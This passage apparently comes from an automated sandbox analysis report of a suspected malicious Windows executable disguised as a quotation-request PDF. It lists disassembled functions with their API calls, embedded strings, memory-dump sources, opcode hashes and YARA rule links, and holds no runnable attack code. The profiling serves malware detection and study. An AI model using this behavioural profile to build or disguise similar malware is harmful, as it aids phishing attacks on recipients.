                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                    • String ID:
                                                                    • API String ID: 3969911579-0
                                                                    • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                    • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                    • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                    • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                    Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                    • String ID: 0
                                                                    • API String ID: 956284711-4108050209
                                                                    • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                    • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                    • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                    • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                    Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                    • String ID: 0.0.0.0
                                                                    • API String ID: 1965227024-3771769585
                                                                    • Opcode ID: cdd1dfb690482b2214089a3a0103eb647f736811691166771604787f4c4d7546
                                                                    • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                    • Opcode Fuzzy Hash: cdd1dfb690482b2214089a3a0103eb647f736811691166771604787f4c4d7546
                                                                    • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                    Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$_memmove_wcslen
                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                    • API String ID: 369157077-1007645807
                                                                    • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                    • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                    • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                    • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                    Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32 ref: 00445BF8
                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                    • __wcsicoll.LIBCMT ref: 00445C33
                                                                    • __wcsicoll.LIBCMT ref: 00445C4F
                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                    • API String ID: 3125838495-3381328864
                                                                    • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                    • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                    • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                    • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                    Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                    • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                    • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                    • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                    • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CharNext
                                                                    • String ID:
                                                                    • API String ID: 1350042424-0
                                                                    • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                    • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                    • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                    • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                    Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                      • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                    • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                    • _wcscpy.LIBCMT ref: 004787E5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                    • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                    • API String ID: 3052893215-2127371420
                                                                    • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                    • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                    • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                    • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                    Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                    • __swprintf.LIBCMT ref: 0045E7F7
                                                                    • _wprintf.LIBCMT ref: 0045E8B3
                                                                    • _wprintf.LIBCMT ref: 0045E8D7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                    • API String ID: 2295938435-2354261254
                                                                    • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                    • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                    • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                    • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                    Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                    • String ID: %.15g$0x%p$False$True
                                                                    • API String ID: 3038501623-2263619337
                                                                    • Opcode ID: 3169b76b2b6c9aab97f551ef2568232911a962d4183b5d8432e009bdf3988692
                                                                    • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                    • Opcode Fuzzy Hash: 3169b76b2b6c9aab97f551ef2568232911a962d4183b5d8432e009bdf3988692
                                                                    • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                    Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                    • __swprintf.LIBCMT ref: 0045E5F6
                                                                    • _wprintf.LIBCMT ref: 0045E6A3
                                                                    • _wprintf.LIBCMT ref: 0045E6C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                    • API String ID: 2295938435-8599901
                                                                    • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                    • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                    • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                    • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                    Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • timeGetTime.WINMM ref: 00443B67
                                                                      • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                    • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                                    • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                    • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                                    • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                    • IsWindow.USER32(00000000), ref: 00443C3A
                                                                    • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                                      • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                      • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                      • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                    • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                    • String ID: BUTTON
                                                                    • API String ID: 1834419854-3405671355
                                                                    • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                    • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                    • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                    • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                    Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                    • LoadStringW.USER32(00000000), ref: 00454040
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • _wprintf.LIBCMT ref: 00454074
                                                                    • __swprintf.LIBCMT ref: 004540A3
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                    • API String ID: 455036304-4153970271
                                                                    • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                    • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                    • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                    • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                    Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                    • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                    • _memmove.LIBCMT ref: 00467EB8
                                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                    • _memmove.LIBCMT ref: 00467F6C
                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                    • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                    • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                    • String ID:
                                                                    • API String ID: 2170234536-0
                                                                    • Opcode ID: 41a2085762b778bd090c4eb4d83ea17da09509ac4ed3f8b2896fc2a1aa5f0729
                                                                    • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
